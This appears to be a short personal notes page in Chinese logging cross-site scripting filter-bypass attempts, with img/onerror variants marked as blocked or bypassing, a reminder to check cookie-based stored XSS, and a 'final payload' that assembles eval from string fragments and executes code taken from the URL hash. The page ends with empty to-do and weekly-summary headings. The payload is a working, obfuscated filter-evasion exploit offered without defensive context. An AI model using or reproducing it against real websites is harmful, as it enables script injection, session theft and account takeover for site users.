随手记
<img/src/onerror=>
被拦截,<img/src/onerror %09=>
bypass
<img src onerror %09=**alert**>
被拦截,<img src onerror %09=top>
bypass
检查基于Cookie的存储型XSS。
最终Payload:
<img/src/onerror %09=testing%3dtop['ev'+'al'];foundit=top['loca'+'tion']['hash']><img/src/onerror=testing(decodeURI(foundit.substr(1)))>
周末待看
[ ]
[ ]
一周总结